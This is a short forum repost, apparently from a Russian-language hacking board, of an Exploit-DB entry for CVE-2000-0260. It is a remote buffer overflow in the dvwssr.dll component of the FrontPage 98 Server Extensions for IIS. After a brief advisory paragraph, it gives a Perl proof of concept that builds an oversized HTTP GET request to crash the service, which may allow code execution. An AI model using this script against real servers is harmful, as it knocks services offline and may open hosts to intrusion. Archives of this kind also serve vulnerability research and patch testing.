Exploit Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
19846
Проверка EDB
  1. Пройдено
Автор
RICHIE & BETO
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0260
Дата публикации
2000-04-14
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/1109/info

The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host. 


#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
 
Источник
www.exploit-db.com

Похожие темы